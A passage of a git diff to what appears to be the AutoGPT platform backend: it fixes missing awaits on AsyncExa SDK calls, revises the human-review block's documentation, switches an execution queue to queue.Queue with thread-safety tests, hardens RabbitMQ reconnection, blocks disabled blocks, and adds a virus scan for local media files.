                    params=CreateWebsetParameters(
                        search=search_params,
                        external_id=input_data.external_id,
@@ -554,7 +554,7 @@ class ExaUpdateWebsetBlock(Block):
        if input_data.metadata is not None:
            payload["metadata"] = input_data.metadata

-        sdk_webset = aexa.websets.update(id=input_data.webset_id, params=payload)
+        sdk_webset = await aexa.websets.update(id=input_data.webset_id, params=payload)

        status_str = (
            sdk_webset.status.value
@@ -617,7 +617,7 @@ class ExaListWebsetsBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        response = aexa.websets.list(
+        response = await aexa.websets.list(
            cursor=input_data.cursor,
            limit=input_data.limit,
        )
@@ -678,7 +678,7 @@ class ExaGetWebsetBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_webset = aexa.websets.get(id=input_data.webset_id)
+        sdk_webset = await aexa.websets.get(id=input_data.webset_id)

        status_str = (
            sdk_webset.status.value
@@ -748,7 +748,7 @@ class ExaDeleteWebsetBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        deleted_webset = aexa.websets.delete(id=input_data.webset_id)
+        deleted_webset = await aexa.websets.delete(id=input_data.webset_id)

        status_str = (
            deleted_webset.status.value
@@ -798,7 +798,7 @@ class ExaCancelWebsetBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        canceled_webset = aexa.websets.cancel(id=input_data.webset_id)
+        canceled_webset = await aexa.websets.cancel(id=input_data.webset_id)

        status_str = (
            canceled_webset.status.value
@@ -968,7 +968,7 @@ class ExaPreviewWebsetBlock(Block):
                entity["description"] = input_data.entity_description
            payload["entity"] = entity

-        sdk_preview = aexa.websets.preview(params=payload)
+        sdk_preview = await aexa.websets.preview(params=payload)

        preview = PreviewWebsetModel.from_sdk(sdk_preview)

@@ -1051,7 +1051,7 @@ class ExaWebsetStatusBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        webset = aexa.websets.get(id=input_data.webset_id)
+        webset = await aexa.websets.get(id=input_data.webset_id)

        status = (
            webset.status.value
@@ -1185,7 +1185,7 @@ class ExaWebsetSummaryBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        webset = aexa.websets.get(id=input_data.webset_id)
+        webset = await aexa.websets.get(id=input_data.webset_id)

        # Extract basic info
        webset_id = webset.id
@@ -1211,7 +1211,7 @@ class ExaWebsetSummaryBlock(Block):
        total_items = 0

        if input_data.include_sample_items and input_data.sample_size > 0:
-            items_response = aexa.websets.items.list(
+            items_response = await aexa.websets.items.list(
                webset_id=input_data.webset_id, limit=input_data.sample_size
            )
            sample_items_data = [
@@ -1362,7 +1362,7 @@ class ExaWebsetReadyCheckBlock(Block):
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

        # Get webset details
-        webset = aexa.websets.get(id=input_data.webset_id)
+        webset = await aexa.websets.get(id=input_data.webset_id)

        status = (
            webset.status.value
--- a/autogpt_platform/backend/backend/blocks/exa/websets_enrichment.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets_enrichment.py
@@ -202,7 +202,7 @@ class ExaCreateEnrichmentBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_enrichment = aexa.websets.enrichments.create(
+        sdk_enrichment = await aexa.websets.enrichments.create(
            webset_id=input_data.webset_id, params=payload
        )

@@ -223,7 +223,7 @@ class ExaCreateEnrichmentBlock(Block):
            items_enriched = 0

            while time.time() - poll_start < input_data.polling_timeout:
-                current_enrich = aexa.websets.enrichments.get(
+                current_enrich = await aexa.websets.enrichments.get(
                    webset_id=input_data.webset_id, id=enrichment_id
                )
                current_status = (
@@ -234,7 +234,7 @@ class ExaCreateEnrichmentBlock(Block):

                if current_status in ["completed", "failed", "cancelled"]:
                    # Estimate items from webset searches
-                    webset = aexa.websets.get(id=input_data.webset_id)
+                    webset = await aexa.websets.get(id=input_data.webset_id)
                    if webset.searches:
                        for search in webset.searches:
                            if search.progress:
@@ -329,7 +329,7 @@ class ExaGetEnrichmentBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_enrichment = aexa.websets.enrichments.get(
+        sdk_enrichment = await aexa.websets.enrichments.get(
            webset_id=input_data.webset_id, id=input_data.enrichment_id
        )

@@ -474,7 +474,7 @@ class ExaDeleteEnrichmentBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        deleted_enrichment = aexa.websets.enrichments.delete(
+        deleted_enrichment = await aexa.websets.enrichments.delete(
            webset_id=input_data.webset_id, id=input_data.enrichment_id
        )

@@ -525,13 +525,13 @@ class ExaCancelEnrichmentBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        canceled_enrichment = aexa.websets.enrichments.cancel(
+        canceled_enrichment = await aexa.websets.enrichments.cancel(
            webset_id=input_data.webset_id, id=input_data.enrichment_id
        )

        # Try to estimate how many items were enriched before cancellation
        items_enriched = 0
-        items_response = aexa.websets.items.list(
+        items_response = await aexa.websets.items.list(
            webset_id=input_data.webset_id, limit=100
        )

--- a/autogpt_platform/backend/backend/blocks/exa/websets_import_export.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets_import_export.py
@@ -222,7 +222,7 @@ class ExaCreateImportBlock(Block):
    def _create_test_mock():
        """Create test mocks for the AsyncExa SDK."""
        from datetime import datetime
-        from unittest.mock import MagicMock
+        from unittest.mock import AsyncMock, MagicMock

        # Create mock SDK import object
        mock_import = MagicMock()
@@ -247,7 +247,7 @@ class ExaCreateImportBlock(Block):
        return {
            "_get_client": lambda *args, **kwargs: MagicMock(
                websets=MagicMock(
-                    imports=MagicMock(create=lambda *args, **kwargs: mock_import)
+                    imports=MagicMock(create=AsyncMock(return_value=mock_import))
                )
            )
        }
@@ -294,7 +294,7 @@ class ExaCreateImportBlock(Block):
        if input_data.metadata:
            payload["metadata"] = input_data.metadata

-        sdk_import = aexa.websets.imports.create(
+        sdk_import = await aexa.websets.imports.create(
            params=payload, csv_data=input_data.csv_data
        )

@@ -360,7 +360,7 @@ class ExaGetImportBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_import = aexa.websets.imports.get(import_id=input_data.import_id)
+        sdk_import = await aexa.websets.imports.get(import_id=input_data.import_id)

        import_obj = ImportModel.from_sdk(sdk_import)

@@ -426,7 +426,7 @@ class ExaListImportsBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        response = aexa.websets.imports.list(
+        response = await aexa.websets.imports.list(
            cursor=input_data.cursor,
            limit=input_data.limit,
        )
@@ -474,7 +474,9 @@ class ExaDeleteImportBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        deleted_import = aexa.websets.imports.delete(import_id=input_data.import_id)
+        deleted_import = await aexa.websets.imports.delete(
+            import_id=input_data.import_id
+        )

        yield "import_id", deleted_import.id
        yield "success", "true"
@@ -573,14 +575,14 @@ class ExaExportWebsetBlock(Block):
            }
        )

-        # Create mock iterator
-        mock_items = [mock_item1, mock_item2]
+        # Create async iterator for list_all
+        async def async_item_iterator(*args, **kwargs):
+            for item in [mock_item1, mock_item2]:
+                yield item

        return {
            "_get_client": lambda *args, **kwargs: MagicMock(
-                websets=MagicMock(
-                    items=MagicMock(list_all=lambda *args, **kwargs: iter(mock_items))
-                )
+                websets=MagicMock(items=MagicMock(list_all=async_item_iterator))
            )
        }

@@ -602,7 +604,7 @@ class ExaExportWebsetBlock(Block):
                webset_id=input_data.webset_id, limit=input_data.max_items
            )

-            for sdk_item in item_iterator:
+            async for sdk_item in item_iterator:
                if len(all_items) >= input_data.max_items:
                    break

--- a/autogpt_platform/backend/backend/blocks/exa/websets_items.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets_items.py
@@ -178,7 +178,7 @@ class ExaGetWebsetItemBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_item = aexa.websets.items.get(
+        sdk_item = await aexa.websets.items.get(
            webset_id=input_data.webset_id, id=input_data.item_id
        )

@@ -269,7 +269,7 @@ class ExaListWebsetItemsBlock(Block):
            response = None

            while time.time() - start_time < input_data.wait_timeout:
-                response = aexa.websets.items.list(
+                response = await aexa.websets.items.list(
                    webset_id=input_data.webset_id,
                    cursor=input_data.cursor,
                    limit=input_data.limit,
@@ -282,13 +282,13 @@ class ExaListWebsetItemsBlock(Block):
                interval = min(interval * 1.2, 10)

            if not response:
-                response = aexa.websets.items.list(
+                response = await aexa.websets.items.list(
                    webset_id=input_data.webset_id,
                    cursor=input_data.cursor,
                    limit=input_data.limit,
                )
        else:
-            response = aexa.websets.items.list(
+            response = await aexa.websets.items.list(
                webset_id=input_data.webset_id,
                cursor=input_data.cursor,
                limit=input_data.limit,
@@ -340,7 +340,7 @@ class ExaDeleteWebsetItemBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        deleted_item = aexa.websets.items.delete(
+        deleted_item = await aexa.websets.items.delete(
            webset_id=input_data.webset_id, id=input_data.item_id
        )

@@ -408,7 +408,7 @@ class ExaBulkWebsetItemsBlock(Block):
            webset_id=input_data.webset_id, limit=input_data.max_items
        )

-        for sdk_item in item_iterator:
+        async for sdk_item in item_iterator:
            if len(all_items) >= input_data.max_items:
                break

@@ -475,7 +475,7 @@ class ExaWebsetItemsSummaryBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        webset = aexa.websets.get(id=input_data.webset_id)
+        webset = await aexa.websets.get(id=input_data.webset_id)

        entity_type = "unknown"
        if webset.searches:
@@ -495,7 +495,7 @@ class ExaWebsetItemsSummaryBlock(Block):
        # Get sample items if requested
        sample_items: List[WebsetItemModel] = []
        if input_data.sample_size > 0:
-            items_response = aexa.websets.items.list(
+            items_response = await aexa.websets.items.list(
                webset_id=input_data.webset_id, limit=input_data.sample_size
            )
            # Convert to our stable models
@@ -569,7 +569,7 @@ class ExaGetNewItemsBlock(Block):
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

        # Get items starting from cursor
-        response = aexa.websets.items.list(
+        response = await aexa.websets.items.list(
            webset_id=input_data.webset_id,
            cursor=input_data.since_cursor,
            limit=input_data.max_items,
--- a/autogpt_platform/backend/backend/blocks/exa/websets_monitor.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets_monitor.py
@@ -233,7 +233,7 @@ class ExaCreateMonitorBlock(Block):
    def _create_test_mock():
        """Create test mocks for the AsyncExa SDK."""
        from datetime import datetime
-        from unittest.mock import MagicMock
+        from unittest.mock import AsyncMock, MagicMock

        # Create mock SDK monitor object
        mock_monitor = MagicMock()
@@ -263,7 +263,7 @@ class ExaCreateMonitorBlock(Block):
        return {
            "_get_client": lambda *args, **kwargs: MagicMock(
                websets=MagicMock(
-                    monitors=MagicMock(create=lambda *args, **kwargs: mock_monitor)
+                    monitors=MagicMock(create=AsyncMock(return_value=mock_monitor))
                )
            )
        }
@@ -320,7 +320,7 @@ class ExaCreateMonitorBlock(Block):
        if input_data.metadata:
            payload["metadata"] = input_data.metadata

-        sdk_monitor = aexa.websets.monitors.create(params=payload)
+        sdk_monitor = await aexa.websets.monitors.create(params=payload)

        monitor = MonitorModel.from_sdk(sdk_monitor)

@@ -384,7 +384,7 @@ class ExaGetMonitorBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_monitor = aexa.websets.monitors.get(monitor_id=input_data.monitor_id)
+        sdk_monitor = await aexa.websets.monitors.get(monitor_id=input_data.monitor_id)

        monitor = MonitorModel.from_sdk(sdk_monitor)

@@ -476,7 +476,7 @@ class ExaUpdateMonitorBlock(Block):
        if input_data.metadata is not None:
            payload["metadata"] = input_data.metadata

-        sdk_monitor = aexa.websets.monitors.update(
+        sdk_monitor = await aexa.websets.monitors.update(
            monitor_id=input_data.monitor_id, params=payload
        )

@@ -522,7 +522,9 @@ class ExaDeleteMonitorBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        deleted_monitor = aexa.websets.monitors.delete(monitor_id=input_data.monitor_id)
+        deleted_monitor = await aexa.websets.monitors.delete(
+            monitor_id=input_data.monitor_id
+        )

        yield "monitor_id", deleted_monitor.id
        yield "success", "true"
@@ -579,7 +581,7 @@ class ExaListMonitorsBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        response = aexa.websets.monitors.list(
+        response = await aexa.websets.monitors.list(
            cursor=input_data.cursor,
            limit=input_data.limit,
            webset_id=input_data.webset_id,
--- a/autogpt_platform/backend/backend/blocks/exa/websets_polling.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets_polling.py
@@ -121,7 +121,7 @@ class ExaWaitForWebsetBlock(Block):
                WebsetTargetStatus.IDLE,
                WebsetTargetStatus.ANY_COMPLETE,
            ]:
-                final_webset = aexa.websets.wait_until_idle(
+                final_webset = await aexa.websets.wait_until_idle(
                    id=input_data.webset_id,
                    timeout=input_data.timeout,
                    poll_interval=input_data.check_interval,
@@ -164,7 +164,7 @@ class ExaWaitForWebsetBlock(Block):
                interval = input_data.check_interval
                while time.time() - start_time < input_data.timeout:
                    # Get current webset status
-                    webset = aexa.websets.get(id=input_data.webset_id)
+                    webset = await aexa.websets.get(id=input_data.webset_id)
                    current_status = (
                        webset.status.value
                        if hasattr(webset.status, "value")
@@ -209,7 +209,7 @@ class ExaWaitForWebsetBlock(Block):

                # Timeout reached
                elapsed = time.time() - start_time
-                webset = aexa.websets.get(id=input_data.webset_id)
+                webset = await aexa.websets.get(id=input_data.webset_id)
                final_status = (
                    webset.status.value
                    if hasattr(webset.status, "value")
@@ -345,7 +345,7 @@ class ExaWaitForSearchBlock(Block):
        try:
            while time.time() - start_time < input_data.timeout:
                # Get current search status using SDK
-                search = aexa.websets.searches.get(
+                search = await aexa.websets.searches.get(
                    webset_id=input_data.webset_id, id=input_data.search_id
                )

@@ -401,7 +401,7 @@ class ExaWaitForSearchBlock(Block):
            elapsed = time.time() - start_time

            # Get last known status
-            search = aexa.websets.searches.get(
+            search = await aexa.websets.searches.get(
                webset_id=input_data.webset_id, id=input_data.search_id
            )
            final_status = (
@@ -503,7 +503,7 @@ class ExaWaitForEnrichmentBlock(Block):
        try:
            while time.time() - start_time < input_data.timeout:
                # Get current enrichment status using SDK
-                enrichment = aexa.websets.enrichments.get(
+                enrichment = await aexa.websets.enrichments.get(
                    webset_id=input_data.webset_id, id=input_data.enrichment_id
                )

@@ -548,7 +548,7 @@ class ExaWaitForEnrichmentBlock(Block):
            elapsed = time.time() - start_time

            # Get last known status
-            enrichment = aexa.websets.enrichments.get(
+            enrichment = await aexa.websets.enrichments.get(
                webset_id=input_data.webset_id, id=input_data.enrichment_id
            )
            final_status = (
@@ -575,7 +575,7 @@ class ExaWaitForEnrichmentBlock(Block):
    ) -> tuple[list[SampleEnrichmentModel], int]:
        """Get sample enriched data and count."""
        # Get a few items to see enrichment results using SDK
-        response = aexa.websets.items.list(webset_id=webset_id, limit=5)
+        response = await aexa.websets.items.list(webset_id=webset_id, limit=5)

        sample_data: list[SampleEnrichmentModel] = []
        enriched_count = 0
--- a/autogpt_platform/backend/backend/blocks/exa/websets_search.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets_search.py
@@ -317,7 +317,7 @@ class ExaCreateWebsetSearchBlock(Block):

        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_search = aexa.websets.searches.create(
+        sdk_search = await aexa.websets.searches.create(
            webset_id=input_data.webset_id, params=payload
        )

@@ -350,7 +350,7 @@ class ExaCreateWebsetSearchBlock(Block):
            poll_start = time.time()

            while time.time() - poll_start < input_data.polling_timeout:
-                current_search = aexa.websets.searches.get(
+                current_search = await aexa.websets.searches.get(
                    webset_id=input_data.webset_id, id=search_id
                )
                current_status = (
@@ -442,7 +442,7 @@ class ExaGetWebsetSearchBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_search = aexa.websets.searches.get(
+        sdk_search = await aexa.websets.searches.get(
            webset_id=input_data.webset_id, id=input_data.search_id
        )

@@ -523,7 +523,7 @@ class ExaCancelWebsetSearchBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        canceled_search = aexa.websets.searches.cancel(
+        canceled_search = await aexa.websets.searches.cancel(
            webset_id=input_data.webset_id, id=input_data.search_id
        )

@@ -604,7 +604,7 @@ class ExaFindOrCreateSearchBlock(Block):
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

        # Get webset to check existing searches
-        webset = aexa.websets.get(id=input_data.webset_id)
+        webset = await aexa.websets.get(id=input_data.webset_id)

        # Look for existing search with same query
        existing_search = None
@@ -636,7 +636,7 @@ class ExaFindOrCreateSearchBlock(Block):
            if input_data.entity_type != SearchEntityType.AUTO:
                payload["entity"] = {"type": input_data.entity_type.value}

-            sdk_search = aexa.websets.searches.create(
+            sdk_search = await aexa.websets.searches.create(
                webset_id=input_data.webset_id, params=payload
            )

--- a/autogpt_platform/backend/backend/blocks/human_in_the_loop.py
+++ b/autogpt_platform/backend/backend/blocks/human_in_the_loop.py
@@ -21,43 +21,71 @@ logger = logging.getLogger(__name__)

 class HumanInTheLoopBlock(Block):
    """
-    This block pauses execution and waits for human approval or modification of the data.
+    Pauses execution and waits for human approval or rejection of the data.

-    When executed, it creates a pending review entry and sets the node execution status
-    to REVIEW. The execution will remain paused until a human user either:
-    - Approves the data (with or without modifications)
-    - Rejects the data
+    When executed, this block creates a pending review entry and sets the node execution
+    status to REVIEW. The execution remains paused until a human user either approves
+    or rejects the data.

-    This is useful for workflows that require human validation or intervention before
-    proceeding to the next steps.
+    **How it works:**
+    - The input data is presented to a human reviewer
+    - The reviewer can approve or reject (and optionally modify the data if editable)
+    - On approval: the data flows out through the `approved_data` output pin
+    - On rejection: the data flows out through the `rejected_data` output pin
+
+    **Important:** The output pins yield the actual data itself, NOT status strings.
+    The approval/rejection decision determines WHICH output pin fires, not the value.
+    You do NOT need to compare the output to "APPROVED" or "REJECTED" - simply connect
+    downstream blocks to the appropriate output pin for each case.
+
+    **Example usage:**
+    - Connect `approved_data` → next step in your workflow (data was approved)
+    - Connect `rejected_data` → error handling or notification (data was rejected)
    """

    class Input(BlockSchemaInput):
-        data: Any = SchemaField(description="The data to be reviewed by a human user")
+        data: Any = SchemaField(
+            description="The data to be reviewed by a human user. "
+            "This exact data will be passed through to either approved_data or "
+            "rejected_data output based on the reviewer's decision."
+        )
        name: str = SchemaField(
-            description="A descriptive name for what this data represents",
+            description="A descriptive name for what this data represents. "
+            "This helps the reviewer understand what they are reviewing.",
        )
        editable: bool = SchemaField(
-            description="Whether the human reviewer can edit the data",
+            description="Whether the human reviewer can edit the data before "
+            "approving or rejecting it",
            default=True,
            advanced=True,
        )

    class Output(BlockSchemaOutput):
        approved_data: Any = SchemaField(
-            description="The data when approved (may be modified by reviewer)"
+            description="Outputs the input data when the reviewer APPROVES it. "
+            "The value is the actual data itself (not a status string like 'APPROVED'). "
+            "If the reviewer edited the data, this contains the modified version. "
+            "Connect downstream blocks here for the 'approved' workflow path."
        )
        rejected_data: Any = SchemaField(
-            description="The data when rejected (may be modified by reviewer)"
+            description="Outputs the input data when the reviewer REJECTS it. "
+            "The value is the actual data itself (not a status string like 'REJECTED'). "
+            "If the reviewer edited the data, this contains the modified version. "
+            "Connect downstream blocks here for the 'rejected' workflow path."
        )
        review_message: str = SchemaField(
-            description="Any message provided by the reviewer", default=""
+            description="Optional message provided by the reviewer explaining their "
+            "decision. Only outputs when the reviewer provides a message; "
+            "this pin does not fire if no message was given.",
+            default="",
        )

    def __init__(self):
        super().__init__(
            id="8b2a7b3c-6e9d-4a5f-8c1b-2e3f4a5b6c7d",
-            description="Pause execution and wait for human approval or modification of data",
+            description="Pause execution for human review. Data flows through "
+            "approved_data or rejected_data output based on the reviewer's decision. "
+            "Outputs contain the actual data, not status strings.",
            categories={BlockCategory.BASIC},
            input_schema=HumanInTheLoopBlock.Input,
            output_schema=HumanInTheLoopBlock.Output,
--- a/autogpt_platform/backend/backend/blocks/llm.py
+++ b/autogpt_platform/backend/backend/blocks/llm.py
@@ -531,12 +531,12 @@ class LLMResponse(BaseModel):

 def convert_openai_tool_fmt_to_anthropic(
    openai_tools: list[dict] | None = None,
-) -> Iterable[ToolParam] | anthropic.NotGiven:
+) -> Iterable[ToolParam] | anthropic.Omit:
    """
    Convert OpenAI tool format to Anthropic tool format.
    """
    if not openai_tools or len(openai_tools) == 0:
-        return anthropic.NOT_GIVEN
+        return anthropic.omit

    anthropic_tools = []
    for tool in openai_tools:
@@ -596,10 +596,10 @@ def extract_openai_tool_calls(response) -> list[ToolContentBlock] | None:

 def get_parallel_tool_calls_param(
    llm_model: LlmModel, parallel_tool_calls: bool | None
-):
+) -> bool | openai.Omit:
    """Get the appropriate parallel_tool_calls parameter for OpenAI-compatible APIs."""
    if llm_model.startswith("o") or parallel_tool_calls is None:
-        return openai.NOT_GIVEN
+        return openai.omit
    return parallel_tool_calls


--- a/autogpt_platform/backend/backend/data/execution.py
+++ b/autogpt_platform/backend/backend/data/execution.py
@@ -1,9 +1,8 @@
 import logging
+import queue
 from collections import defaultdict
 from datetime import datetime, timedelta, timezone
 from enum import Enum
-from multiprocessing import Manager
-from queue import Empty
 from typing import (
    TYPE_CHECKING,
    Annotated,
@@ -1200,12 +1199,16 @@ class NodeExecutionEntry(BaseModel):

 class ExecutionQueue(Generic[T]):
    """
-    Queue for managing the execution of agents.
-    This will be shared between different processes
+    Thread-safe queue for managing node execution within a single graph execution.
+
+    Note: Uses queue.Queue (not multiprocessing.Queue) since all access is from
+    threads within the same process. If migrating back to ProcessPoolExecutor,
+    replace with multiprocessing.Manager().Queue() for cross-process safety.
    """

    def __init__(self):
-        self.queue = Manager().Queue()
+        # Thread-safe queue (not multiprocessing) — see class docstring
+        self.queue: queue.Queue[T] = queue.Queue()

    def add(self, execution: T) -> T:
        self.queue.put(execution)
@@ -1220,7 +1223,7 @@ class ExecutionQueue(Generic[T]):
    def get_or_none(self) -> T | None:
        try:
            return self.queue.get_nowait()
-        except Empty:
+        except queue.Empty:
            return None


--- a/autogpt_platform/backend/backend/data/execution_queue_test.py
+++ b/autogpt_platform/backend/backend/data/execution_queue_test.py
@@ -0,0 +1,58 @@
+"""Tests for ExecutionQueue thread-safety."""
+
+import queue
+import threading
+
+from backend.data.execution import ExecutionQueue
+
+
+def test_execution_queue_uses_stdlib_queue():
+    """Verify ExecutionQueue uses queue.Queue (not multiprocessing)."""
+    q = ExecutionQueue()
+    assert isinstance(q.queue, queue.Queue)
+
+
+def test_basic_operations():
+    """Test add, get, empty, and get_or_none."""
+    q = ExecutionQueue()
+
+    assert q.empty() is True
+    assert q.get_or_none() is None
+
+    result = q.add("item1")
+    assert result == "item1"
+    assert q.empty() is False
+
+    item = q.get()
+    assert item == "item1"
+    assert q.empty() is True
+
+
+def test_thread_safety():
+    """Test concurrent access from one producer and one consumer thread."""
+    q = ExecutionQueue()
+    results = []
+    num_items = 100
+
+    def producer():
+        for i in range(num_items):
+            q.add(f"item_{i}")
+
+    def consumer():
+        count = 0
+        while count < num_items:
+            item = q.get_or_none()
+            if item is not None:
+                results.append(item)
+                count += 1
+
+    # Daemon threads: a stuck consumer must fail the test, not hang the interpreter
+    producer_thread = threading.Thread(target=producer, daemon=True)
+    consumer_thread = threading.Thread(target=consumer, daemon=True)
+    producer_thread.start()
+    consumer_thread.start()
+
+    producer_thread.join(timeout=5)
+    consumer_thread.join(timeout=5)
+
+    assert results == [f"item_{i}" for i in range(num_items)]
--- a/autogpt_platform/backend/backend/data/graph.py
+++ b/autogpt_platform/backend/backend/data/graph.py
@@ -743,6 +743,11 @@ class GraphModel(Graph, GraphMeta):
                # For invalid blocks, we still raise immediately as this is a structural issue
                raise ValueError(f"Invalid block {node.block_id} for node #{node.id}")

+            if block.disabled:
+                raise ValueError(
+                    f"Block {node.block_id} is disabled and cannot be used in graphs"
+                )
+
            node_input_mask = (
                nodes_input_masks.get(node.id, {}) if nodes_input_masks else {}
            )
--- a/autogpt_platform/backend/backend/data/rabbitmq.py
+++ b/autogpt_platform/backend/backend/data/rabbitmq.py
@@ -1,3 +1,4 @@
+import asyncio
 import logging
 from abc import ABC, abstractmethod
 from enum import Enum
@@ -225,6 +226,10 @@ class SyncRabbitMQ(RabbitMQBase):
 class AsyncRabbitMQ(RabbitMQBase):
    """Asynchronous RabbitMQ client"""

+    def __init__(self, config: RabbitMQConfig):
+        super().__init__(config)
+        self._reconnect_lock: asyncio.Lock | None = None
+
    @property
    def is_connected(self) -> bool:
        return bool(self._connection and not self._connection.is_closed)
@@ -235,7 +240,17 @@ class AsyncRabbitMQ(RabbitMQBase):

    @conn_retry("AsyncRabbitMQ", "Acquiring async connection")
    async def connect(self):
-        if self.is_connected:
+        if self.is_connected and self._channel and not self._channel.is_closed:
+            return
+
+        if (
+            self.is_connected
+            and self._connection
+            and (self._channel is None or self._channel.is_closed)
+        ):
+            self._channel = await self._connection.channel()
+            await self._channel.set_qos(prefetch_count=1)
+            await self.declare_infrastructure()
            return

        self._connection = await aio_pika.connect_robust(
@@ -291,24 +306,46 @@ class AsyncRabbitMQ(RabbitMQBase):
                    exchange, routing_key=queue.routing_key or queue.name
                )

-    @func_retry
-    async def publish_message(
+    @property
+    def _lock(self) -> asyncio.Lock:
+        if self._reconnect_lock is None:
+            self._reconnect_lock = asyncio.Lock()
+        return self._reconnect_lock
+
+    async def _ensure_channel(self) -> aio_pika.abc.AbstractChannel:
+        """Get a valid channel, reconnecting if the current one is stale.
+
+        Uses a lock to prevent concurrent reconnection attempts from racing.
+        """
+        if self.is_ready:
+            return self._channel  # type: ignore  # is_ready guarantees non-None
+
+        async with self._lock:
+            # Double-check after acquiring lock
+            if self.is_ready:
+                return self._channel  # type: ignore
+
+            self._channel = None
+            await self.connect()
+
+            if self._channel is None:
+                raise RuntimeError("Channel should be established after connect")
+
+            return self._channel
+
+    async def _publish_once(
        self,
        routing_key: str,
        message: str,
        exchange: Optional[Exchange] = None,
        persistent: bool = True,
    ) -> None:
-        if not self.is_ready:
-            await self.connect()
-
-        if self._channel is None:
-            raise RuntimeError("Channel should be established after connect")
+        channel = await self._ensure_channel()

        if exchange:
-            exchange_obj = await self._channel.get_exchange(exchange.name)
+            exchange_obj = await channel.get_exchange(exchange.name)
        else:
-            exchange_obj = self._channel.default_exchange
+            exchange_obj = channel.default_exchange

        await exchange_obj.publish(
            aio_pika.Message(
@@ -322,9 +359,23 @@ class AsyncRabbitMQ(RabbitMQBase):
            routing_key=routing_key,
        )

+    @func_retry
+    async def publish_message(
+        self,
+        routing_key: str,
+        message: str,
+        exchange: Optional[Exchange] = None,
+        persistent: bool = True,
+    ) -> None:
+        try:
+            await self._publish_once(routing_key, message, exchange, persistent)
+        except aio_pika.exceptions.ChannelInvalidStateError:
+            logger.warning(
+                "RabbitMQ channel invalid, forcing reconnect and retrying publish"
+            )
+            async with self._lock:
+                self._channel = None
+            await self._publish_once(routing_key, message, exchange, persistent)
+
    async def get_channel(self) -> aio_pika.abc.AbstractChannel:
-        if not self.is_ready:
-            await self.connect()
-        if self._channel is None:
-            raise RuntimeError("Channel should be established after connect")
-        return self._channel
+        return await self._ensure_channel()
--- a/autogpt_platform/backend/backend/executor/manager.py
+++ b/autogpt_platform/backend/backend/executor/manager.py
@@ -213,6 +213,9 @@ async def execute_node(
        block_name=node_block.name,
    )

+    if node_block.disabled:
+        raise ValueError(f"Block {node_block.id} is disabled and cannot be executed")
+
    # Sanity check: validate the execution input.
    input_data, error = validate_exec(node, data.inputs, resolve_input=False)
    if input_data is None:
--- a/autogpt_platform/backend/backend/util/file.py
+++ b/autogpt_platform/backend/backend/util/file.py
@@ -342,6 +342,14 @@ async def store_media_file(
        if not target_path.is_file():
            raise ValueError(f"Local file does not exist: {target_path}")

+        # Size-check, then virus scan the local file before any further processing
+        local_content = target_path.read_bytes()
+        if len(local_content) > MAX_FILE_SIZE_BYTES:
+            raise ValueError(
+                f"File too large: {len(local_content)} bytes > {MAX_FILE_SIZE_BYTES} bytes"
+            )
+        await scan_content_safe(local_content, filename=sanitized_file)
+
    # Return based on requested format
    if return_format == "for_local_processing":
        # Use when processing files locally with tools like ffmpeg, MoviePy, PIL
--- a/autogpt_platform/backend/backend/util/file_test.py
+++ b/autogpt_platform/backend/backend/util/file_test.py
@@ -247,3 +247,100 @@ class TestFileCloudIntegration:
                    execution_context=make_test_context(graph_exec_id=graph_exec_id),
                    return_format="for_local_processing",
                )
+
+    @pytest.mark.asyncio
+    async def test_store_media_file_local_path_scanned(self):
+        """Test that local file paths are scanned for viruses."""
+        graph_exec_id = "test-exec-123"
+        local_file = "test_video.mp4"
+        file_content = b"fake video content"
+
+        with patch(
+            "backend.util.file.get_cloud_storage_handler"
+        ) as mock_handler_getter, patch(
+            "backend.util.file.scan_content_safe"
+        ) as mock_scan, patch(
+            "backend.util.file.Path"
+        ) as mock_path_class:
+
+            # Mock cloud storage handler - not a cloud path
+            mock_handler = MagicMock()
+            mock_handler.is_cloud_path.return_value = False
